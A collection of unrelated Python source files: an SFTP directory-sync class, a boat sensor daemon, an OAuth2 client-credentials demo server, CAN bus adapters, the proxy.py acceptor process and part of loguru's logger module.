self.sftp_client = ssh_client_dict['connection'].open_sftp()
except (paramiko.SSHException): #SSH session not active
reconn_thread = threading.Thread(target=self.__reconnect)
reconn_thread.start()
reconn_thread.join()
if autosync:
self.sync_thread = threading.Thread(target=self.__sync)
self.sync_thread.start()
def exec_journals(self):
direxists = self.__directory_exists(os.path.join(self.remotepath, self.root))
print (f'{"@"+self.hostname+" " if self.hostname else ""}Reading the Journals. Updating Remote Server Files...\n')
''' If the Directory does not Exist (First-Time Syncing) Create the whole Directory Tree '''
if not direxists:
self.__cwd_scp(self.localpath, self.remotepath)
else:
''' Read the Journal and Update the Necessary Files '''
for activity in self.__journal():
# activity : ['timestamp' ,'event' , 'src', 'dest']
src_path = activity[2]
if activity[1] == 'moved':
dest_path = activity[3]
self.sftp_client.posix_rename(os.path.join(self.remotepath, self.root, ''.join(src_path.split(self.root, 1)[1:]).strip('/')),
os.path.join(self.remotepath, self.root, ''.join(dest_path.split(self.root, 1)[1:]).strip('/')))
elif activity[1] == 'created':
dest_path = os.path.join(self.remotepath, self.root, ''.join(src_path.split(self.root, 1)[1:]).strip('/'))
if os.path.isdir(src_path):
self.sftp_client.mkdir(dest_path)
else:
self.sftp_client.put(src_path, dest_path, callback=None, confirm=True)
elif activity[1] == 'deleted':
dest_path = os.path.join(self.remotepath, self.root, ''.join(src_path.split(self.root, 1)[1:]).strip('/'))
if os.path.isdir(src_path):
self.sftp_client.rmdir(dest_path)
else:
self.sftp_client.remove(dest_path)
elif activity[1] == 'modified':
dest_path = os.path.join(self.remotepath, self.root, ''.join(src_path.split(self.root, 1)[1:]).strip('/'))
if os.path.isdir(src_path):
pass
else:
if not cmp(src_path, dest_path, self.sftp_client, shallow=self.shallow_filecmp):
self.sftp_client.put(src_path, dest_path, callback=None, confirm=True)
def on_moved(self, event):
super(ServerWorkSync, self).on_moved(event)
timestamp = int(time.time())
what = 'directory' if event.is_directory else 'file'
if self.verbose: print(f'{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Moved", "b")} {what}: from {event.src_path} to {event.dest_path}')
rec = [timestamp, 'moved', event.src_path, event.dest_path]
self.__journal(mode='w', data=rec)
def on_created(self, event):
super(ServerWorkSync, self).on_created(event)
timestamp = int(time.time())
what = 'directory' if event.is_directory else 'file'
if self.verbose: print(f'{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Created", "g")} {what}: {event.src_path}')
rec = [timestamp, 'created', event.src_path, '']
self.__journal(mode='w', data=rec)
def on_deleted(self, event):
super(ServerWorkSync, self).on_deleted(event)
timestamp = int(time.time())
what = 'directory' if event.is_directory else 'file'
if self.verbose: print(f'{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Deleted", "r")} {what}: {event.src_path}')
rec = [timestamp, 'deleted', event.src_path, '']
self.__journal(mode='w', data=rec)
def on_modified(self, event):
super(ServerWorkSync, self).on_modified(event)
timestamp = int(time.time())
what = 'directory' if event.is_directory else 'file'
if self.verbose: print(f'{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Modified", "y")} {what}: {event.src_path}')
rec = [timestamp, 'modified', event.src_path, '']
self.__journal(mode='w', data=rec)
#####################################################################################
################################# PRIVATE FUNCTIONS #################################
#####################################################################################
def __reconnect(self):
while True:
try:
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_pkey = paramiko.RSAKey.from_private_key_file(self.ssh_client_dict['pkey'])
ssh_client.connect(hostname=self.ssh_client_dict['host'], username=self.ssh_client_dict['uname'],\
port=self.ssh_client_dict['port'], pkey=ssh_pkey)
self.ssh_client_dict['connection'] = ssh_client
self.sftp_client = self.ssh_client_dict['connection'].open_sftp()
break
except (paramiko.SSHException, IOError):
pass
time.sleep(self.reconnect_interval)
def __sync(self):
while True:
try:
self.__exec_journals()
self.__clear_journals()
except (paramiko.SSHException, IOError): #SSH session not active
self.__reconnect()
finally:
time.sleep(self.sync_interval)
#####################################################################################
################################ AUXILIARY FUNCTIONS ################################
#####################################################################################
def __colorize(self, msg, color):
''' (on_moved): Blue
(on_created): Green
(on_deleted): Red
(on_modified): Yellow '''
if color is 'b':
return f'{Style.BRIGHT}{Fore.BLUE}{msg}{Style.RESET_ALL}'
elif color is 'g':
return f'{Style.BRIGHT}{Fore.GREEN}{msg}{Style.RESET_ALL}'
elif color is 'r':
return f'{Style.BRIGHT}{Fore.RED}{msg}{Style.RESET_ALL}'
elif color is 'y':
return f'{Style.BRIGHT}{Fore.YELLOW}{msg}{Style.RESET_ALL}'
def __remote_os_walk(self, root):
files = []
dirs = []
for f in self.sftp_client.listdir_attr(root):
if stat.S_ISDIR(f.st_mode):
dirs.append(f.filename)
else:
files.append(f.filename)
yield root, dirs, files
for folder in dirs:
for x in self.__remote_os_walk(self.__unix_path(root, folder)):
yield x
def __unix_path(self, *args):
"""Most handle UNIX pathing, not vice versa, enforce standard"""
return os.path.join(*args).replace('\\', '/')
def __directory_exists(self, path):
'os.path.exists for paramiko SCP object'
try:
self.sftp_client.stat(path)
except IOError as e:
if e.errno == errno.ENOENT:
return False
raise
else:
return True
def mkdir_p(self, remote_path, is_dir=False):
"""
Bringing mkdir -p to Paramiko.
sftp - is a valid sftp object (that's provided by the class)
remote_path - path to create on server.
is_dir - Flag that indicates whether remote_path is a directory or not.
If remote_path is a directory then the file part is stripped away and mkdir_p continues as usual.
"""
dirs_ = []
if is_dir:
dir_ = remote_path
else:
dir_, _ = os.path.split(remote_path)
while len(dir_) > 1:
dirs_.append(dir_)
dir_, _ = os.path.split(dir_)
if len(dir_) == 1 and not dir_.startswith("/"):
dirs_.append(dir_) # For a remote path like y/x.txt
while len(dirs_):
dir_ = dirs_.pop()
try:
self.sftp_client.stat(dir_)
except:
if self.verbose: print (f'{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Created", "g")} directory {dir_}')
self.sftp_client.mkdir(dir_)
def __cwd_scp(self, localpath, remotepath):
# recursively upload a full directory
tmp = os.getcwd()
os.chdir(os.path.split(localpath)[0])
for walker in os.walk(self.root):
try:
self.sftp_client.mkdir(os.path.join(remotepath,walker[0]))
except:
pass
for file in walker[2]:
if self.verbose: print (f'\t{"@"+self.hostname+" " if self.hostname else ""}{self.__colorize("Copying", "g")} {os.path.join(walker[0],file)}...')
self.sftp_client.put(os.path.join(walker[0],file),os.path.join(remotepath,walker[0],file))
os.chdir(tmp)
def __filter_journals(self):
try:
with self.sftp_client.open(os.path.join(self.ssh_client_dict['recon_path'], 'logs', 'journal.csv'), 'r') as f:
remote_journal = pd.read_csv(f, index_col=[0])
except FileNotFoundError:
remote_journal = None
local_journal = pd.read_csv(os.path.join(os.path.expanduser('~'), '.recon', 'logs', 'journal.csv'), index_col=[0])
fn = pd.concat([remote_journal,local_journal], ignore_index=True)
fn['rel'] = fn['src'].apply(lambda path: ''.join(path.split(self.root, 1)[1:]).strip('/'))
exp = fn.loc[fn.groupby(['rel']).timestamp.idxmax()]
return exp.drop(['rel'], axis=1)
# TODO: Make it better, Make it fast.
def __clear_journals(self):
try:
with self.sftp_client.open(os.path.join(self.ssh_client_dict['recon_path'], 'logs', 'journal.csv'), 'r') as f:
remote_journal = pd.read_csv(f, index_col=[0])
with self.sftp_client.open(os.path.join(self.ssh_client_dict['recon_path'], 'logs', 'journal.csv'), 'w+') as f:
remote_journal.iloc[0:0].to_csv(f)
except FileNotFoundError:
pass
local_journal = pd.read_csv(os.path.join(os.path.expanduser('~'), '.recon', 'logs', 'journal.csv'), index_col=[0])
local_journal.iloc[0:0].to_csv(os.path.join(os.path.expanduser('~'), '.recon', 'logs', 'journal.csv'))
def __journal(self, mode='r', data=None):
if mode is 'r':
journal = self.__filter_journals()
for row in journal.iterrows():
yield row[1]
if mode is 'w':
with open(self.journal_path, mode=mode) as f:
writer = csv.writer(f)
writer.writerows(data)
if mode is 'h':
with open(self.journal_path, mode='w') as f:
writer = csv.writer(f)
writer.writeheader(data)
|
sensord.py
|
#!/usr/bin/python3
#
# Copyright (c) 2017-2021 Ilker Temir
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import importlib
import json
import os
import socket
import sys
import threading
import time
PORT = 1920
client_list = []
class BoatSensor(object):
'''
Main class
'''
def __init__(self):
'''
All plugins under ./plugins directory will be automatically loaded and
initialized.
'''
self.lock = threading.Lock()
base_dir = os.path.dirname(os.path.abspath(__file__))
for root, dirs, files in os.walk(os.path.join(base_dir, 'plugins')):
for file in files:
if file.endswith(".py") and file != '__init__.py':
plugin_file = 'plugins.' + file.replace('.py', '')
plugin = importlib.import_module(plugin_file).plugin(self)
if plugin.enabled:
# Each plugin is run on its own thread
thread = threading.Thread(target=plugin.start)
thread.daemon = True
thread.start()
def emit(self, values):
'''
Called by individual plugins to emit messages
'''
data = '{"updates":[{"$source":"sensord","values":%s}]}' % json.dumps(values)
self.sock.sendto(data.encode('utf-8'), ('127.0.0.1', PORT))
def run(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
try:
time.sleep(0.5)
except KeyboardInterrupt:
sys.exit()
if __name__ == '__main__':
sensord = BoatSensor()
sensord.run()
|
client_credentials_grant.py
|
import os
import signal
import sys
from wsgiref.simple_server import WSGIRequestHandler, make_server
sys.path.insert(0, os.path.abspath(os.path.realpath(__file__) + '/../../../'))
from oauth2 import Provider
from oauth2.grant import ClientCredentialsGrant
from oauth2.store.memory import ClientStore, TokenStore
from oauth2.tokengenerator import Uuid4TokenGenerator
from oauth2.web.wsgi import Application
from multiprocessing import Process
class OAuthRequestHandler(WSGIRequestHandler):
"""
Request handler that enables formatting of the log messages on the console.
This handler is used by the oauth2-stateless application.
"""
def address_string(self):
return "oauth2-stateless"
def run_auth_server():
try:
client_store = ClientStore()
client_store.add_client(client_id="abc", client_secret="xyz", redirect_uris=[])
token_store = TokenStore()
token_gen = Uuid4TokenGenerator()
token_gen.expires_in['client_credentials'] = 3600
auth_controller = Provider(
access_token_store=token_store,
auth_code_store=token_store,
client_store=client_store,
token_generator=token_gen)
auth_controller.add_grant(ClientCredentialsGrant())
app = Application(provider=auth_controller)
httpd = make_server('', 8080, app, handler_class=OAuthRequestHandler)
print("Starting implicit_grant oauth2 server on http://localhost:8080/...")
httpd.serve_forever()
except KeyboardInterrupt:
httpd.server_close()
def main():
auth_server = Process(target=run_auth_server)
auth_server.start()
print("To test getting an auth token, execute the following curl command:")
print("curl --ipv4 -v -X POST -d 'grant_type=client_credentials&client_id=abc&client_secret=xyz' "
"http://localhost:8080/token")
def sigint_handler(signal, frame):
print("Terminating server...")
auth_server.terminate()
auth_server.join()
signal.signal(signal.SIGINT, sigint_handler)
if __name__ == "__main__":
main()
|
adapters.py
|
import can
import socket
import struct
import serial
from queue import Queue
import threading
class SocketCANConnection:
# See <linux/can.h> for format
CAN_FRAME_FMT = "=IB3x8s"
CAN_FRAME_SIZE = struct.calcsize(CAN_FRAME_FMT)
def __init__(self, interface):
"""
Initiates a CAN connection on the given interface (e.g. 'can0').
"""
# Creates a raw CAN connection and binds it to the given interface.
self.socket = socket.socket(socket.AF_CAN,
socket.SOCK_RAW,
socket.CAN_RAW)
self.socket.bind((interface, ))
self.socket.settimeout(1.)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 4096)
def send_frame(self, frame):
data = frame.data.ljust(8, b'\x00')
data = struct.pack(self.CAN_FRAME_FMT,
frame.id,
len(frame.data),
data)
self.socket.send(data)
def receive_frame(self):
try:
frame, _ = self.socket.recvfrom(self.CAN_FRAME_SIZE)
except socket.timeout:
return None
can_id, can_dlc, data = struct.unpack(self.CAN_FRAME_FMT, frame)
return can.Frame(id=can_id, data=data[:can_dlc])
class SerialCANConnection:
"""
Implements the slcan API.
"""
MIN_MSG_LEN = len('t1230')
def __init__(self, port):
self.port = port
self.rx_queue = Queue()
t = threading.Thread(target=self.spin)
t.daemon = True
t.start()
self.send_command('S8'); # bitrate 1Mbit
self.send_command('O'); # open device
port.reset_input_buffer()
def spin(self):
part = ''
while True:
part += self.port.read(100).decode('ascii')
if part.startswith('\r'):
part.lstrip('\r')
if '\r' not in part:
continue
data = part.split('\r')
data, part = data[:-1], data[-1]
for frame in data:
if frame is None:
continue
frame = self.decode_frame(frame)
if frame:
self.rx_queue.put(frame)
def send_command(self, cmd):
cmd += '\r'
cmd = cmd.encode('ascii')
self.port.write(cmd)
def decode_frame(self, msg):
if len(msg) < self.MIN_MSG_LEN:
return None
cmd, msg = msg[0], msg[1:]
if cmd == 'T':
extended = True
id_len = 8
elif cmd == 't':
extended = False
id_len = 3
else:
return None
if len(msg) < id_len + 1:
return None
can_id = int(msg[0:id_len], 16)
msg = msg[id_len:]
data_len = int(msg[0])
msg = msg[1:]
if len(msg) < 2 * data_len:
return None
data = [int(msg[i:i+2], 16) for i in range(0, 2 * data_len, 2)]
return can.Frame(id=can_id, data=bytearray(data), data_length=data_len, extended=extended)
def encode_frame(self, frame):
if frame.extended:
cmd = 'T'
can_id = '{:08x}'.format(frame.id)
else:
cmd = 't'
can_id = '{:03x}'.format(frame.id)
length = '{:x}'.format(frame.data_length)
data = ''
for b in frame.data:
data += '{:02x}'.format(b)
return cmd + can_id + length + data
def send_frame(self, frame):
cmd = self.encode_frame(frame)
self.send_command(cmd)
def receive_frame(self):
try:
return self.rx_queue.get(True, 1) # block with timeout 1 sec
except:
return None
|
acceptor.py
|
# -*- coding: utf-8 -*-
"""
proxy.py
~~~~~~~~
⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on
Network monitoring, controls & Application development, testing, debugging.
:copyright: (c) 2013-present by Abhinav Singh and contributors.
:license: BSD, see LICENSE for more details.
"""
import logging
import multiprocessing
import multiprocessing.synchronize
import selectors
import socket
import threading
from multiprocessing import connection
from multiprocessing.reduction import send_handle, recv_handle
from typing import Optional, Type, Tuple
from .work import Work
from .threadless import Threadless
from ..connection import TcpClientConnection
from ..event import EventQueue, eventNames
from ...common.constants import DEFAULT_THREADLESS
from ...common.flags import Flags
from ...common.flag import flags
logger = logging.getLogger(__name__)
flags.add_argument(
'--threadless',
action='store_true',
default=DEFAULT_THREADLESS,
help='Default: False. When disabled a new thread is spawned '
'to handle each client connection.'
)
class Acceptor(multiprocessing.Process):
"""Socket server acceptor process.
Accepts a server socket fd over `work_queue` and start listening for client
connections over the passed server socket. By default, it spawns a separate thread
to handle each client request.
However, if `--threadless` option is enabled, Acceptor process will also pre-spawns a `Threadless`
process at startup. Accepted client connections are then passed to the `Threadless` process
which internally uses asyncio event loop to handle client connections.
TODO(abhinavsingh): Instead of starting `Threadless` process, can we work with a `Threadless` thread?
What are the performance implications of sharing fds between threads vs processes? How much performance
degradation happen when processes are running on separate CPU cores?
"""
def __init__(
self,
idd: int,
work_queue: connection.Connection,
flags: Flags,
work_klass: Type[Work],
lock: multiprocessing.synchronize.Lock,
event_queue: Optional[EventQueue] = None) -> None:
super().__init__()
self.idd = idd
self.work_queue: connection.Connection = work_queue
self.flags = flags
self.work_klass = work_klass
self.lock = lock
self.event_queue = event_queue
self.running = multiprocessing.Event()
self.selector: Optional[selectors.DefaultSelector] = None
self.sock: Optional[socket.socket] = None
self.threadless_process: Optional[Threadless] = None
self.threadless_client_queue: Optional[connection.Connection] = None
def start_threadless_process(self) -> None:
pipe = multiprocessing.Pipe()
self.threadless_client_queue = pipe[0]
self.threadless_process = Threadless(
client_queue=pipe[1],
flags=self.flags,
work_klass=self.work_klass,
event_queue=self.event_queue
)
self.threadless_process.start()
logger.debug('Started process %d', self.threadless_process.pid)
def shutdown_threadless_process(self) -> None:
assert self.threadless_process and self.threadless_client_queue
logger.debug('Stopped process %d', self.threadless_process.pid)
self.threadless_process.running.set()
self.threadless_process.join()
self.threadless_client_queue.close()
def start_work(self, conn: socket.socket, addr: Tuple[str, int]) -> None:
if self.flags.threadless and \
self.threadless_client_queue and \
self.threadless_process:
self.threadless_client_queue.send(addr)
send_handle(
self.threadless_client_queue,
conn.fileno(),
self.threadless_process.pid
)
conn.close()
else:
work = self.work_klass(
TcpClientConnection(conn, addr),
flags=self.flags,
event_queue=self.event_queue
)
work_thread = threading.Thread(target=work.run)
work_thread.daemon = True
work.publish_event(
event_name=eventNames.WORK_STARTED,
event_payload={'fileno': conn.fileno(), 'addr': addr},
publisher_id=self.__class__.__name__
)
work_thread.start()
def run_once(self) -> None:
with self.lock:
assert self.selector and self.sock
events = self.selector.select(timeout=1)
if len(events) == 0:
return
conn, addr = self.sock.accept()
self.start_work(conn, addr)
def run(self) -> None:
self.selector = selectors.DefaultSelector()
fileno = recv_handle(self.work_queue)
self.work_queue.close()
self.sock = socket.fromfd(
fileno,
family=self.flags.family,
type=socket.SOCK_STREAM
)
try:
self.selector.register(self.sock, selectors.EVENT_READ)
if self.flags.threadless:
self.start_threadless_process()
while not self.running.is_set():
self.run_once()
except KeyboardInterrupt:
pass
finally:
self.selector.unregister(self.sock)
if self.flags.threadless:
self.shutdown_threadless_process()
self.sock.close()
logger.debug('Acceptor#%d shutdown', self.idd)
|
_logger.py
|
"""
.. References and links rendered by Sphinx are kept here as "module documentation" so that they can
be used in the ``Logger`` docstrings but do not pollute ``help(logger)`` output.
.. |Logger| replace:: :class:`~Logger`
.. |add| replace:: :meth:`~Logger.add()`
.. |remove| replace:: :meth:`~Logger.remove()`
.. |complete| replace:: :meth:`~Logger.complete()`
.. |catch| replace:: :meth:`~Logger.catch()`
.. |bind| replace:: :meth:`~Logger.bind()`
.. |contextualize| replace:: :meth:`~Logger.contextualize()`
.. |patch| replace:: :meth:`~Logger.patch()`
.. |opt| replace:: :meth:`~Logger.opt()`
.. |log| replace:: :meth:`~Logger.log()`
.. |level| replace:: :meth:`~Logger.level()`
.. |enable| replace:: :meth:`~Logger.enable()`
.. |disable| replace:: :meth:`~Logger.disable()`
.. |str| replace:: :class:`str`
.. |int| replace:: :class:`int`
.. |bool| replace:: :class:`bool`
.. |tuple| replace:: :class:`tuple`
.. |namedtuple| replace:: :func:`namedtuple<collections.namedtuple>`
.. |list| replace:: :class:`list`
.. |dict| replace:: :class:`dict`
.. |str.format| replace:: :meth:`str.format()`
.. |Path| replace:: :class:`pathlib.Path`
.. |match.groupdict| replace:: :meth:`re.Match.groupdict()`
.. |Handler| replace:: :class:`logging.Handler`
.. |sys.stderr| replace:: :data:`sys.stderr`
.. |sys.exc_info| replace:: :func:`sys.exc_info()`
.. |time| replace:: :class:`datetime.time`
.. |datetime| replace:: :class:`datetime.datetime`
.. |timedelta| replace:: :class:`datetime.timedelta`
.. |open| replace:: :func:`open()`
.. |logging| replace:: :mod:`logging`
.. |contextvars| replace:: :mod:`contextvars`
.. |Thread.run| replace:: :meth:`Thread.run()<threading.Thread.run()>`
.. |Exception| replace:: :class:`Exception`
.. |locale.getpreferredencoding| replace:: :func:`locale.getpreferredencoding()`
.. |AbstractEventLoop| replace:: :class:`AbstractEventLoop<asyncio.AbstractEventLoop>`
.. |asyncio.get_event_loop| replace:: :func:`asyncio.get_event_loop()`
.. |asyncio.run| replace:: :func:`asyncio.run()`
.. |loop.run_until_complete| replace::
:meth:`loop.run_until_complete()<asyncio.loop.run_until_complete()>`
.. |loop.create_task| replace:: :meth:`loop.create_task()<asyncio.loop.create_task()>`
.. |logger.trace| replace:: :meth:`logger.trace()<Logger.trace()>`
.. |logger.debug| replace:: :meth:`logger.debug()<Logger.debug()>`
.. |logger.info| replace:: :meth:`logger.info()<Logger.info()>`
.. |logger.success| replace:: :meth:`logger.success()<Logger.success()>`
.. |logger.warning| replace:: :meth:`logger.warning()<Logger.warning()>`
.. |logger.error| replace:: :meth:`logger.error()<Logger.error()>`
.. |logger.critical| replace:: :meth:`logger.critical()<Logger.critical()>`
.. |file-like object| replace:: ``file-like object``
.. _file-like object: https://docs.python.org/3/glossary.html#term-file-object
.. |callable| replace:: ``callable``
.. _callable: https://docs.python.org/3/library/functions.html#callable
.. |coroutine function| replace:: ``coroutine function``
.. _coroutine function: https://docs.python.org/3/glossary.html#term-coroutine-function
.. |re.Pattern| replace:: ``re.Pattern``
.. _re.Pattern: https://docs.python.org/3/library/re.html#re-objects
.. |better_exceptions| replace:: ``better_exceptions``
.. _better_exceptions: https://github.com/Qix-/better-exceptions
.. _Pendulum: https://pendulum.eustace.io/docs/#tokens
.. _@sdispater: https://github.com/sdispater
.. _@Qix-: https://github.com/Qix-
.. _Formatting directives: https://docs.python.org/3/library/string.html#format-string-syntax
"""
import asyncio
import builtins
import contextlib
import functools
import itertools
import logging
import re
import sys
import warnings
from collections import namedtuple
from inspect import isclass, iscoroutinefunction, isgeneratorfunction
from multiprocessing import current_process
from os.path import basename, splitext
from threading import current_thread
from . import _colorama, _defaults, _filters
from ._better_exceptions import ExceptionFormatter
from ._colorizer import Colorizer
from ._datetime import aware_now
from ._error_interceptor import ErrorInterceptor
from ._file_sink import FileSink
from ._get_frame import get_frame
from ._handler import Handler
from ._locks_machinery import create_logger_lock
from ._recattrs import RecordException, RecordFile, RecordLevel, RecordProcess, RecordThread
from ._simple_sinks import AsyncSink, CallableSink, StandardSink, StreamSink
if sys.version_info >= (3, 6):
from os import PathLike
else:
from pathlib import PurePath as PathLike
if sys.version_info >= (3, 7):
from contextvars import ContextVar
elif sys.version_info >= (3, 5, 3):
from aiocontextvars import ContextVar
else:
from contextvars import ContextVar
Level = namedtuple("Level", ["name", "no", "color", "icon"])
start_time = aware_now()
context = ContextVar("loguru_context", default={})
class Core:
def __init__(self):
levels = [
Level(
"TRACE",
_defaults.LOGURU_TRACE_NO,
_defaults.LOGURU_TRACE_COLOR,
_defaults.LOGURU_TRACE_ICON,
),
Level(
"DEBUG",
_defaults.LOGURU_DEBUG_NO,
_defaults.LOGURU_DEBUG_COLOR,
_defaults.LOGURU_DEBUG_ICON,
),
Level(
"INFO",
_defaults.LOGURU_INFO_NO,
_defaults.LOGURU_INFO_COLOR,
_defaults.LOGURU_INFO_ICON,
),
Level(
"SUCCESS",
_defaults.LOGURU_SUCCESS_NO,
_defaults.LOGURU_SUCCESS_COLOR,
_defaults.LOGURU_SUCCESS_ICON,
),
Level(
"WARNING",
_defaults.LOGURU_WARNING_NO,
_defaults.LOGURU_WARNING_COLOR,
_defaults.LOGURU_WARNING_ICON,
),
Level(
"ERROR",
_defaults.LOGURU_ERROR_NO,
_defaults.LOGURU_ERROR_COLOR,
_defaults.LOGURU_ERROR_ICON,
),
Level(
"CRITICAL",
_defaults.LOGURU_CRITICAL_NO,
_defaults.LOGURU_CRITICAL_COLOR,
_defaults.LOGURU_CRITICAL_ICON,
),
]
self.levels = {level.name: level for level in levels}
self.levels_ansi_codes = {
name: Colorizer.ansify(level.color) for name, level in self.levels.items()
}
self.levels_ansi_codes[None] = ""
self.handlers_count = itertools.count()
self.handlers = {}
self.extra = {}
self.patcher = None
self.min_level = float("inf")
self.enabled = {}
self.activation_list = []
self.activation_none = True
self.lock = create_logger_lock()
def __getstate__(self):
state = self.__dict__.copy()
state["lock"] = None
return state
def __setstate__(self, state):
self.__dict__.update(state)
self.lock = create_logger_lock()
class Logger:
"""An object to dispatch logging messages to configured handlers.
The |Logger| is the core object of ``loguru``, every logging configuration and usage pass
through a call to one of its methods. There is only one logger, so there is no need to retrieve
one before usage.
Once the ``logger`` is imported, it can be used to write messages about events happening in your
code. By reading the output logs of your application, you gain a better understanding of the
flow of your program and you more easily track and debug unexpected behaviors.
Handlers to which the logger sends log messages are added using the |add| method. Note that you
can use the |Logger| right after import as it comes pre-configured (logs are emitted to
|sys.stderr| by default). Messages can be logged with different severity levels and using braces
attributes like the |str.format| method do.
When a message is logged, a "record" is associated with it. This record is a dict which contains
information about the logging context: time, function, file, line, thread, level... It also
contains the ``__name__`` of the module, this is why you don't need named loggers.
You should not instantiate a |Logger| by yourself, use ``from loguru import logger`` instead.
"""
def __init__(self, core, exception, depth, record, lazy, colors, raw, capture, patcher, extra):
self._core = core
self._options = (exception, depth, record, lazy, colors, raw, capture, patcher, extra)
def __repr__(self):
return "<loguru.logger handlers=%r>" % list(self._core.handlers.values())
def add(
self,
sink,
*,
level=_defaults.LOGURU_LEVEL,
format=_defaults.LOGURU_FORMAT,
filter=_defaults.LOGURU_FILTER,
colorize=_defaults.LOGURU_COLORIZE,
serialize=_defaults.LOGURU_SERIALIZE,
backtrace=_defaults.LOGURU_BACKTRACE,
diagnose=_defaults.LOGURU_DIAGNOSE,
enqueue=_defaults.LOGURU_ENQUEUE,
catch=_defaults.LOGURU_CATCH,
**kwargs
):
r"""Add a handler sending log messages to a sink adequately configured.
Parameters
----------
sink : |file-like object|_, |str|, |Path|, |callable|_, |coroutine function|_ or |Handler|
An object in charge of receiving formatted logging messages and propagating them to an
appropriate endpoint.
level : |int| or |str|, optional
The minimum severity level from which logged messages should be sent to the sink.
format : |str| or |callable|_, optional
The template used to format logged messages before being sent to the sink.
filter : |callable|_, |str| or |dict|, optional
A directive optionally used to decide for each logged message whether it should be sent
to the sink or not.
colorize : |bool|, optional
Whether the color markups contained in the formatted message should be converted to ansi
codes for terminal coloration, or stripped otherwise. If ``None``, the choice is
automatically made based on the sink being a tty or not.
serialize : |bool|, optional
Whether the logged message and its records should be first converted to a JSON string
before being sent to the sink.
backtrace : |bool|, optional
Whether the exception trace formatted should be extended upward, beyond the catching
point, to show the full stacktrace which generated the error.
diagnose : |bool|, optional
Whether the exception trace should display the variables values to eases the debugging.
This should be set to ``False`` in production to avoid leaking sensitive data.
enqueue : |bool|, optional
Whether the messages to be logged should first pass through a multiprocess-safe queue
before reaching the sink. This is useful while logging to a file through multiple
processes. This also has the advantage of making logging calls non-blocking.
catch : |bool|, optional
Whether errors occurring while sink handles logs messages should be automatically
caught. If ``True``, an exception message is displayed on |sys.stderr| but the exception
is not propagated to the caller, preventing your app to crash.
**kwargs
Additional parameters that are only valid to configure a coroutine or file sink (see
below).
If and only if the sink is a coroutine function, the following parameter applies:
Parameters
----------
loop : |AbstractEventLoop|, optional
The event loop in which the asynchronous logging task will be scheduled and executed. If
``None``, the loop returned by |asyncio.get_event_loop| is used.
If and only if the sink is a file path, the following parameters apply:
Parameters
----------
rotation : |str|, |int|, |time|, |timedelta| or |callable|_, optional
A condition indicating whenever the current logged file should be closed and a new one
started.
retention : |str|, |int|, |timedelta| or |callable|_, optional
A directive filtering old files that should be removed during rotation or end of
program.
compression : |str| or |callable|_, optional
A compression or archive format to which log files should be converted at closure.
delay : |bool|, optional
Whether the file should be created as soon as the sink is configured, or delayed until
first logged message. It defaults to ``False``.
mode : |str|, optional
The opening mode as for built-in |open| function. It defaults to ``"a"`` (open the
file in appending mode).
buffering : |int|, optional
The buffering policy as for built-in |open| function. It defaults to ``1`` (line
buffered file).
encoding : |str|, optional
The file encoding as for built-in |open| function. If ``None``, it defaults to
|locale.getpreferredencoding|.
**kwargs
Others parameters are passed to the built-in |open| function.
Returns
-------
:class:`int`
An identifier associated with the added sink and which should be used to
|remove| it.
Notes
-----
Extended summary follows.
.. _sink:
.. rubric:: The sink parameter
The ``sink`` handles incoming log messages and proceed to their writing somewhere and
somehow. A sink can take many forms:
- A |file-like object|_ like ``sys.stderr`` or ``open("somefile.log", "w")``. Anything with
a ``.write()`` method is considered as a file-like object. Custom handlers may also
implement ``flush()`` (called after each logged message), ``stop()`` (called at sink
termination) and ``complete()`` (awaited by the eponymous method).
- A file path as |str| or |Path|. It can be parametrized with some additional parameters,
see below.
- A |callable|_ (such as a simple function) like ``lambda msg: print(msg)``. This
allows for logging procedure entirely defined by user preferences and needs.
- A asynchronous |coroutine function|_ defined with the ``async def`` statement. The
coroutine object returned by such function will be added to the event loop using
|loop.create_task|. The tasks should be awaited before ending the loop by using
|complete|.
- A built-in |Handler| like ``logging.StreamHandler``. In such a case, the `Loguru` records
are automatically converted to the structure expected by the |logging| module.
Note that you should avoid using the ``logger`` inside any of your sinks as this would
result in infinite recursion or dead lock if the module's sink was not explicitly disabled.
.. _message:
.. rubric:: The logged message
The logged message passed to all added sinks is nothing more than a string of the
formatted log, to which a special attribute is associated: the ``.record`` which is a dict
containing all contextual information possibly needed (see below).
Logged messages are formatted according to the ``format`` of the added sink. This format
is usually a string containing braces fields to display attributes from the record dict.
If fine-grained control is needed, the ``format`` can also be a function which takes the
record as parameter and return the format template string. However, note that in such a
case, you should take care of appending the line ending and exception field to the returned
format, while ``"\n{exception}"`` is automatically appended for convenience if ``format`` is
a string.
The ``filter`` attribute can be used to control which messages are effectively passed to the
sink and which one are ignored. A function can be used, accepting the record as an
argument, and returning ``True`` if the message should be logged, ``False`` otherwise. If
a string is used, only the records with the same ``name`` and its children will be allowed.
One can also pass a ``dict`` mapping module names to minimum required level. In such case,
each log record will search for it's closest parent in the ``dict`` and use the associated
level as the filter. The ``dict`` values can be ``int`` severity, ``str`` level name or
